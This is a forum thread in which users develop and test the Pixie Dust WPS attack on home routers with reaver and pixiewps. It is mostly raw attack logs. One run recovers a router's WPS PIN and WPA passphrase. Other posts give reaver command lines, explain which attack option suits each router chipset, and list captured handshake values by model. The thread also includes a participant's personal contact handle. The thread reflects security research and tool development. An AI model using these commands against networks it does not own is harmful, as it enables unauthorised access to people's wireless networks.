[P] PKE: 7f:1f:e6:78:73:18:20:fc:f8:a4:1c:dd:b6:6f:2f:a4:fb:19:2e:45:45:9a:3c:21:4b:ca:b3:ef:74:25:af:c2:a5:77:f0:da:a6:bc:7b:30:9a:24:36:d6:8c:e6:70:dd:fc:3f:53:2d:ba:f5:35:97:5c:04:c8:96:a7:37:f5:c7:0a:3d:40:74:c5:18:c3:a3:6a:c0:bb:92:e2:98:85:79:46:51:e5:01:0f:fc:9f:3f:70:42:9f:6c:4f:3f:8f:58:bb:2f:b8:48:e5:41:64:82:ea:49:c5:80:8b:60:71:0c:31:e8:d6:30:5a:d7:e5:f8:60:02:e0:9b:c8:e0:19:5b:23:61:ff:8f:47:5d:e2:94:9f:20:a2:5e:3d:25:6d:4f:6f:93:9b:32:c9:b4:12:4b:a9:7f:80:69:f8:48:8c:eb:a3:5d:25:94:3f:19:67:91:e1:96:aa:1e:1b:49:37:46:45:39:6a:a2:17:db:7a:1c:6b:34:94:db:64:bd:f5:18
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 123456
[P] WPS Model Serial Number: 1234
[+] Received M1 message
[P] PKR: 95:2b:f1:10:06:77:c0:86:a1:ed:4e:72:1b:86:ab:a0:0f:0f:cd:53:36:31:8f:6b:7e:24:15:19:15:6e:b5:35:c3:f8:8b:0c:11:52:59:79:70:0c:20:5d:36:ca:8a:49:a7:28:19:55:71:c3:69:a5:49:b9:f5:6c:8a:6b:91:6f:79:a3:35:77:59:86:2e:8b:92:f6:d6:e2:b1:c5:72:c9:bd:96:8e:55:5c:48:c5:9c:71:68:77:1f:2e:d0:79:f1:46:c3:f6:98:5c:32:a8:01:f2:f4:71:d3:52:82:67:0c:85:58:b5:eb:f5:5d:a0:61:47:b3:91:1b:b8:1c:2f:b8:90:b3:ec:cd:9c:28:f3:1f:26:d0:5a:7e:1d:65:ca:f0:d1:1d:e2:ce:a3:9a:02:65:8d:15:85:07:30:20:dc:d3:6c:04:de:a4:23:b3:ec:72:bc:13:a6:60:cd:d0:72:98:fd:53:35:ff:6e:d5:6c:60:45:ba:75:7a:3c:ff:a0:4e
[P] AuthKey: 96:60:ce:20:f5:dd:07:56:0c:71:21:e7:bf:6a:34:5b:97:4c:2a:80:23:bf:48:5b:d5:28:cf:51:2d:32:a6:0b
[+] Sending M2 message
[P] E-Hash1: d6:b8:56:b3:22:cb:8e:b1:15:c6:3c:b8:a4:21:99:4c:ff:a2:fb:88:d7:47:21:73:3f:2b:0c:fd:92:be:92:5a
[P] E-Hash2: 96:bc:4e:e2:e1:14:a5:ea:8e:a3:65:03:66:f0:ef:d6:6f:ea:c9:9c:ee:60:07:dc:be:e0:63:c2:67:1c:8d:ea
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]

Billion 7800N Vulnerable

XX:XX:XX:XX:XX:XX| 1|-40|1.0|No |Corona| http://www.billion.com.au| 1.0

OUI: 00-0c-43 (RalinkTe)

RT2880iNIC

[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 4b:65:ca:9d:f1:f3:8c:76:3a:ab:b7:42:8a:92:2f:b5
[P] PKE: fd:a7:c9:c0:d9:4c:7e:fd:24:ea:5a:ec:64:e2:f1:d5:aa :f6:75:e8:f8:7f:70:a3:e9:97:5f:6c:a3:92:60:42:34:d c:ae:63:d1:ef:99:61:26:46:23:aa:26:95:61:4a:df:91: 63:f9:77:fe:0e:a6:17:d2:2e:d1:39:27:d2:78:03:50:8f :06:7b:74:c6:08:af:11:0b:17:4e:75:db:52:b9:56:40:3 8:90:6a:d2:c0:69:af:d3:22:9e:45:b2:f3:fe:6f:b2:74: 2b:c3:93:b3:e6:9d:74:57:5f:f0:7a:0d:ad:34:0d:47:b7 :72:2b:5d:0d:b2:d1:7b:d3:6e:24:a8:dc:f8:e1:84:f8:a 8:65:bf:96:5a:7c:ee:4e:3e:09:80:c4:c1:07:92:1a:06: 83:bb:f2:64:e3:f9:06:39:b5:c3:23:9c:7a:4f:a3:56:3a :2c:56:83:1b:fe:c2:da:35:69:06:45:d4:5a:f1:6e:25:2 4:86:f2:db:3b:0a:0a:b7:21
[P] WPS Manufacturer: http://www.billion.com.au
[P] WPS Model Number: 1.0
[P] WPS Model Serial Number: 12345678
[+] Received M1 message
[P] PKR: a7:b1:8c:7c:db:7e:28:fb:8a:27:9f:e9:ff:93:12:9d:ae :6b:89:ea:65:54:c2:2b:a2:0a:7b:d7:ee:57:ec:76:71:f 5:5f:32:a4:94:ce:53:82:0c:9e:95:e7:e7:69:18:da:0d: f0:f2:ec:ba:b3:bd:21:bc:d3:98:ac:86:e8:1a:b3:09:e7 :db:23:e3:ed:e2:d6:e7:ec:aa:da:53:45:60:78:98:78:7 d:0d:09:5b:58:32:1b:8a:3a:96:b9:52:b0:0c:e3:ec:ee: db:92:cf:bf:0f:87:d5:84:ce:3a:73:28:a4:90:99:f5:3c :67:c6:1e:9c:06:35:fa:07:ed:15:f5:a1:fe:29:b3:ab:e d:50:86:74:30:11:97:a6:17:e7:5e:f7:72:1f:4f:bf:30: 20:43:0f:bc:88:53:1a:fc:e0:db:96:3a:f6:66:1d:d1:31 :c7:4a:44:a1:f1:d5:05:a0:80:c7:22:bd:29:e0:ed:b8:d d:80:be:70:ea:ff:a4:3c:47
[P] AuthKey: 4c:23:09:ed:5f:b8:15:15:1e:61:b6:99:46:53:d7:2b:9c :85:13:28:80:55:b7:b5:e5:6e:bd:cc:35:99:c5:85
[+] Sending M2 message
[P] E-Hash1: e6:87:2c:1f:b0:60:de:3f:65:8a:4b:02:30:36:1e:da:b3 :0e:58:ee:54:db:bc:d0:72:61:55:de:39:5f:a9:bb
[P] E-Hash2: e8:c0:54:54:fa:f8:e1:ef:ad:ed:5b:90:81:60:af:6f:53 :c5:74:2d:ba:aa:6c:28:28:e6:a5:fa:8c:78:fe:ec
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 91:5a:dd:fd:ef:ce:21:83:97:a9:13:ef:ed:94:5a:cf
[Pixie-Dust][*] PSK2: 91:e6:ab:f1:08:66:bf:56:3e:df:3a:df:67:5a:de:90
[Pixie-Dust] [+] WPS pin: 48606684
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -s y -p 48606684

[Reaver Test] BSSID: XX:XX:XX:XX:XX:XX
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '48606684'
[Reaver Test] [+] WPA PSK: 'Routersecurityflawed'
[Reaver Test] [+] AP SSID: 'Corona'


Excellent work on the mods to reaver and the pixie wps

Cheers
Extra

[soxrok2212]

Hello Everyone !

I want first to congratulate you about the great steps you did through this Pixie Dust Exploit.

Also, I have noticed that today, on the WPS Pixie Dust Database , the router Technicolor TD5130 is being said as Vulnerable.

However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

So I want to know who could perform this exploit, and how (with full description if possible) ?

There is also a TD5130 v3 that I'd love to test it on and share with you all.

Thank You !

The Realtek implementation is unfinished as of right now, 4/17/15. It ONLY works if the whole entire WPS exchange occurs within 1 second (here, E-S1 = E-S2 = E-Nonce). Wiire is currently working on the PRNG brute force and it shouldn't be too long that it is finished. In the meantime, I suggest you wait and don't try to attack it again so you don't get locked out. If you want, you can send me all the keys/info and I'll look into it more

[slim76]

Very very very nice work guys, guess theres no stopping progress. :-)

Would anyone mind if I added the pixie dust attack into FrankenScript?.

[Quest]

... guess theres no stopping progress...

hey that's my line!!!

Would anyone mind if I added the pixie dust attack into FrankenScript?.

I don't

[Jynn]

It would be interesting you put the output of reaver.

So we can see what chipset is and other information

I hope the following output of the tests of 3 routers is useful :

root@kali64:~# reaver -i mon0 -b 5C9:98:33:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 5C9:98:33:xx:xx
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Associated with 5C9:98:33:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: fc:09:f4:f8:14:f7:d8:6a:e0:1f:45:af:39:c7:0f:ad
[P] PKE: 85:84:7e:84:11:31:2e:77:e4:1b:da:ca:e5:be:c5:7f:1f :66:b5:e8:5f:21:f9:54:87:4f:49:ab:f4:bf:2d:93:e8:1 f:f3:92:de:d5:96:0f:98:25:e5:dd:74:d5:5a:ad:85:cc: 5a:f1:9d:c3:17:02:26:89:30:50:b4:e3:43:52:51:56:27 :7a:22:c2:a2:6d:ba:4c:c5:01:2d:ca:0c:21:ac:4c:94:1 2:27:aa:d1:3d:7c:49:bc:26:46:ac:c6:d6:e4:34:50:7c: 91:fd:25:fd:30:07:09:8d:88:5f:46:b8:ed:1e:99:70:42 :1b:29:31:7c:75:9c:56:4a:75:ee:3e:2d:0e:b1:45:e0:1 a:c7:e5:b4:e7:f8:88:bf:ae:87:2e:49:10:92:06:17:94: 49:c0:5d:4c:17:87:79:4c:c8:de:01:b0:0b:24:fb:2d:bd :4c:cb:80:99:7d:b4:d4:fa:af:38:8d:92:b2:77:ac:0d:6 9:9d:58:dc:a9:31:08:98:da
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 9a:86:3f:ff:71:8d:9d:e6:53:e3:a9:d7:e0:f8:95:cf:74 :0e:7e:88:32:67:c9:d1:87:2a:6b:e3:5a:17:88:4e
[+] Sending M2 message
[P] E-Hash1: 31:a7:13:e2:68:e4:4a:6f:af:c7:04:08:6e:5d:93:62:21 :b9:8e:a3:c3:31:47:d2:44:11:49:43:ef:ae:ac:c8
[P] E-Hash2: 3c:60:ee:50:64:40:4a:16:52:73:3f:2c:34:9b:6c:7e:47 :71:9a:bc:71:b6:96:a1:3c:9b:c9:bc:14:ce:6d:76
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]


root@kali64:~# reaver -i mon0 -b 40:16:7E:5D:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 40:16:7E:5D:xx:xx
[+] Switching mon0 to channel 1
[+] Associated with 40:16:7E:5D:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c3:b1:c2:3b:2a:5f:f3:35:83:c4:d2:68:16:64:d9:76
[P] PKE: ae:90:dd:03:c2:b4:b0:7f:17:5d:c9:cf:3a:d8:6b:ca:1f :24:08:20:55:a8:73:65:6f:61:b7:a3:a8:2c:00:58:fb:d 0:3d:bc:35:a6:f6:10:fc:d2:c1:70:1c:9d:5f:af:d6:ed: 3f:ab:38:ff:86:9d:f7:84:6f:22:3b:cf:1e:9f:bf:cc:a1 :74:07:a1:69:7c:71:75:4e:cf:10:d6:34:d8:3a:b4:07:5 8:50:95:70:73:53:0e:c3:0f:de:34:7d:51:05:ad:74:82: 08:c6:04:ef:f9:42:a8:29:19:0c:68:64:63:ee:77:d8:50 :b6:fb:9e:7d:87:84:86:fe:78:6e:54:15:b6:32:3c:60:9 2:1c:aa:ce:49:a7:13:09:2b:ee:a8:4c:31:d3:09:b6:11: c4:16:32:c5:b9:9e:0d:65:89:96:f1:7f:37:2f:42:75:d2 :cf:50:b6:67:70:a7:1a:28:a8:d1:e8:4a:ec:a9:26:9f:b 7:c8:ea:78:9f:ad:e3:06:a8
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Number: RT-N12
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 8d:9c:e2:47:23:ac:b2:d1:f6:de:cd:d5:c1:d3:3f:41:13 :a4:e7:5c:20:3b:24:7c:f2:1a:4b:19:6f:ca:68:3b
[+] Sending M2 message
[P] E-Hash1: 6b:0f:9b:cd:c8:0e:92:78:13:6f:b8:01:f1:45:0c:3d:99 :88:60:1d:5d:69:6e:e6:55:da:44:a1:d9:61:1f:52
[P] E-Hash2: 0c:16:eb:80:24:18:f5:1a:7d:c3:11:ba:c4:1c:e6:d6:56 :81:31:c3:76:6a:52:1c:4a:c6:5e:ad:0c:51:19:7b
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]



root@kali64:~# reaver -i mon0 -b 64:70:02:5C:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[?] Restore previous session for 64:70:02:5C:xx:xx? [n/Y] n

[+] Associated with 64:70:02:5C:xx:xx (ESSID: xxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: bf:1e:7d:b5:18:9e:f0:66:22:9c:5e:20:2e:43:31:6c
[P] PKE: 9d:48:eb:a8:25:6e:6b:7d:aa:f5:b9:f2:da:49:66:b9:cd :8f:b1:ab:25:16:ba:7b:df:87:71:7e:d1:e8:af:b1:71:b a:c4:96:89:d8:db:1b:57:2c:61:cc:0e:a4:c6:31:02:38: 43:50:d1:be:b1:83:49:19:3e:8c:ed:9f:55:e5:6e:a7:1a :05:c5:5f:22:e0:c4:ac:d5:5d:d6:bd:32:a8:1d:e2:6f:2 5:78:e6:9a:4d:55:f1:7b:dd:ba:ed:13:7f:33:a6:76:38: af:c2:b5:d6:10:42:eb:98:4e:f6:fe:90:dd:4d:79:d6:08 :d7:3a:0c:86:11:4d:b5:75:76:d7:4c:48:a3:00:33:97:2 c:b5:57:a3:83:1a:5c:58:94:78:53:cf:58:54:c2:1f:fa: ec:91:06:84:d9:95:2a:38:31:72:a2:cc:17:63:a0:13:a0 :9e:7d:cf:cd:14:dd:07:82:76:2c:76:7d:2d:e2:fd:4a:d 9:a2:f4:b0:b1:fc:80:18:b1
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 08:a0:73:06:7c:1c:bf:77:d9:04:a5:14:90:8f:b6:5d:4b :d7:f5:06:7a:8d:f4:e0:25:88:ae:70:07:d8:f4:82
[+] Sending M2 message
[P] E-Hash1: 2d:55:4e:4a:17:6a:87:ac:33:ae:e4:be:f8:3c:94:f0:d9 :ee:fd:5c:a6:a8:af:96:20:8a:07:e7:5d:cd:cd:35
[P] E-Hash2: 11:f1:24:8c:37:54:fd:3c:5b:f3:b5:66:df:6a:58:e9:9c :f4:2c:9d:d5:ab:4e:36:89:bc:d8:27:9c:ac:15:7d
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]

[iliass]

we want please if possible give as method to add more router and thanks @soxrok2212

[soxrok2212]

Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

[iliass]

soxrok2212 ..thanks for your works ..but in routeur TD5130 and TG589 V3 d ont works ..and we want a methode you are using for put routeurs in pxiewps

[slim76]

@ Quest

I heard your call matey, Guess I'll be adding it to FrankenScript. :-)

[slim76]

Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

Hello matey,

Any idea what -K option should be used with what chipsets?.

[soxrok2212]

Hello matey,

Any idea what -K option should be used with what chipsets?.

Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

Code:

The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once

1 should be used with Ralink and -S used in reaver
2 should be used with Broadcom and -S used in reaver
3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

[nuroo]

Yea. agreed. I suggested to t6_x this idea on his thread.

Just have reaver/pixie try all three attacks. User just wants the pin/passphrase quickly. Doesnt really care how. If user really wants to know which attack the AP was vulnerable to let him use --vvv.

[Quest]

@ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

Anyways good to see you back and a new Franken looming [thumb up emoticon here]

[slim76]

Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

Code:

The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once

1 should be used with Ralink and -S used in reaver
2 should be used with Broadcom and -S used in reaver
3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

Cheers for the info matey, its made things much clearer for me. :-)
Cheers again for all your hard work, its greatly appreciated.

[soxrok2212]

@ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

Anyways good to see you back and a new Franken looming [thumb up emoticon here]

Yeah, to be honest, I'd wait another week or two at least. Doing A LOT of work and there are still a lot of bugs to be ironed out. Anyways, I was thinking about starting a giant group-dev chat on Skype...? It would make communication a lot faster and info could be shared much much quicker. If you want to add me, my Skype is robert.jor49. I'm already in contact with a few of you guys, but theres still a few of you who are not there.

[slim76]

@ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

Anyways good to see you back and a new Franken looming [thumb up emoticon here]

I thought things would change a little, it shouldn't be much of an issue, worse case I'll have to rewrite the pixie attack in FrankenScript.
I'm hoping to upload a tempory version of FrankenScript within the next few days if all goes well.

Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase?, or should it just print the Pin & Passphrase?.

[soxrok2212]

Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase?, or should it just print the Pin & Passphrase?.

Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver.

[slim76]

I just noticed something about the install of pixwps, the install directory is different for different install methods.

apt-get installs pixiewps to: usr/bin
make & make install installs pixiewps to: /usr/local/bin

Does anyone know if reaver-wps-fork-t6x & reaver from the kali repo will detect pixiewps in either/both locations?

[slim76]

Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver.

Sorry I mean't details like the PKR, PKE, EHash, chipset and such.

[soxrok2212]

Sorry I mean't details like the PKR, PKE, EHash, chipset and such.

Oh. Chipset/Model number/Manufacturer yes, the rest, no... just in case they want to report their findings

[patter1]

Hello
This site is in German. I hope this site helps with DLINK and Speedport.
https://www.wardriving-forum.de/wiki...ardpasswörter

[someone_else]

Some new Signatures (tested with all 4 possible pixiewps option-combinations)

NOT VULNERABLE:

Code:

ASUS RT-N66U
Broadcom BCM4706

[P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
[P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86:c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48:01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5:78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:ab:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78:17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18:97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5:07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b:2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4d:47:4a:b2:59:6a:3e:43:9b
[P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb:68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e:f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6:bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:db:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7:82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3:7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:53:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb:a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e:18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:df:38:d1:2b:71:d4:3e:3e:cc
[P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6:65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
[P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3:19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
[P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b:f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94

NOT VULNERABLE:

Code:

NETGEAR WN3100RP (WiFi-Repeater)

[P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
[P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44:67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6:be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f:d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53:95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3:03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c:2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31:90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:ad:38:01:14:79:2d:bb:6e:90
[P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71:a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:09:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04:b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37:48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:ef:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b:7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee:1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:18:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74:0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc:47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:60:60:96:dc:d0:a2:10:f9:71
[P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8:76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
[P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90:08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
[P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61:a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79

Code:

VULNERABLE:

NETGEAR JNR3210
Realtek RTL8198

[P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
